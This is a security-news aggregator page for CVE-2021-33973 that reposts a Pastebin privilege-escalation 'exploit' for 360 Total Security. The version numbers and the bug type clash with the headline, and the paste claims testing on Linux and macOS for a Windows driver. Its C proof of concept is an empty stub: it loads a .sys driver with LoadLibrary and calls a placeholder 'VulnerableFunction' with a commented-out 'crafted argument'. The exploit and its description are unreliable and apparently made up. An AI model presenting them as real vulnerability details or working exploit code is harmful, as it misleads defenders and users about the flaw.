Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-33973: CVE-2021-33973 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Safe guard v12.1.0.1004, v12.1.0.1005, v13.1.0.1001 allows attacker to escalate priveleges.

CVE
#vulnerability#mac#windows#google#linux#debian#buffer_overflow#auth
  1. # Exploit Title: 360 Total Security 10.8.0.1213 Local Privilege Escalation

  2. # Google Dork: N/A

  3. # Date: 2021-05-11

  4. # Exploit Author: youtube.com/@memorycorruptor

  5. # Vendor Homepage: http://www.360totalsecurity.com/

  6. # Version: 360 Total Security 10.8.0.1213

  7. # Tested on: Windows x64 / Linux Debian x64 / MacOS

  8. # CVE: CVE-2021-33973

  9. # PoC Video: https://www.youtube.com/@memorycorruptor/videos

  10. # Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html

  11. ---------------------------------------------------------------------------

  12. Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1213

  1. A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1213, which allows the antivirus software to execute actions with system-level privileges while running under standard user privileges, The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.
  1. Introduction

  2. 360 Total Security 10.8.0.1213 is an antivirus software that provides protection against various threats. A recently discovered LPE/EOP vulnerability in the software allows it to perform actions with system-level privileges while running under standard user privileges. This article analyzes this vulnerability and provides a PoC to demonstrate the exploit.

  1. Vulnerability

  2. The LPE/EOP vulnerability in 360 Total Security 10.8.0.1213 is similar to a Windows kernel vulnerability discovered in 2021. It allows the antivirus software to perform actions with system-level privileges, bypassing the usual security checks in Windows. This can lead to unauthorized access, data theft, or other malicious actions.

  1. Proof of Concept
  1. #include <Windows.h>

  2. #include <stdio.h>

  1. int main() {

  2. // Load the vulnerable driver

  3. HMODULE hDriver = LoadLibrary(“360TotalSecurity.sys”);

  4. if (!hDriver) {

  5. printf("Failed to load driver: %d\n", GetLastError());

  6. return 1;

  7. }

  1. // Get address

  2. FARPROC pVulnFunc = GetProcAddress(hDriver, “VulnerableFunction”);

  3. if (!pVulnFunc) {

  4. printf("Failed to get function address: %d\n", GetLastError());

  5. FreeLibrary(hDriver);

  6. return 1;

  7. }

  1. // Exploit code
  1. pVulnFunc(/* Crafted argument */);
  1. FreeLibrary(hDriver);

  2. return 0;

  3. }

  1. the vulnerable driver (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability.

  2. ---------------------------------------------------------------------------

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907